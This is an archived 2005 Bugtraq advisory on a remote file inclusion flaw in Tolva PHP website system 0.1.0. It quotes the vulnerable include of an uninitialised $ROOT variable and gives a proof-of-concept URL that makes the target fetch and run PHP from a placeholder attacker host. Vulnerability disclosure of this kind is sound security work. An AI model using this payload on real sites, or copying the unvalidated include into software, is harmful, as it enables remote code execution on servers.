lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Dec 2005 02:10:48 -0500
From: beford <xbefordx@...il.com>
To: bugtraq@...urityfocus.com
Subject: Tolva PHP website system Remote File Include


Script: Tolva PHP website system
Version: 0.1.0
Language: PHP
Official Website: http://sourceforge.net/projects/twebs
Problem: Remote File Include
Discovered by: beford

Description:
============

A complete collection of php scripts that work tightly together to
create a highly customizable, dynamic and module oriented website.

Problem:
========

A remote user can supply a specially crafted URL to cause the target
system to include and execute arbitrary PHP code from a remote
location. A remote user can execute arbitrary PHP code and operating
system commands on the target system with the privileges of the target
web service. The problem is in the file
"/twebs-0.1.0/src/modules/misc/usermods.php". It seems like there are
other files
affected by the same vuln.


<?PHP
$mod_id=$uid;
include("$ROOT/modules/main.php");
?>


The variable $ROOT isn't initialized and the usermods.php file doesn't
validate user-supplied data in this parameter.


Proof of Concept URL:
==================

http://[target]/twebs/modules/misc/usermods.php?ROOT=http://[attacker_url]


Solution:
========

No solution at this time.


Greets:
=======

http://www.odiameporserelite.org/foro/	 * I know, 1337 domain name eh? :P

uyx, Zetha, lithyum, stranger, desKrriado, |LINUX|, Amon-Ra, Extremo,
SecretDreams, caffa, Pamela David
Garybay, r0Y, Mafia_Boy, all ASC, icenix, ][GB][, HaCkZaTan,
Apocalypse, Terror_Br, DIM and Puta

http://www.odiameporserelite.org/
irc.gigachat.net #uruguay, #h4ck3rsbr, #IYS, #D.O.M, #MSR
irc.fullnetwork.org #full, #f4kelive, #venezuela, #d.o.m
irc.com.ve #uruguay, #venezuela


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ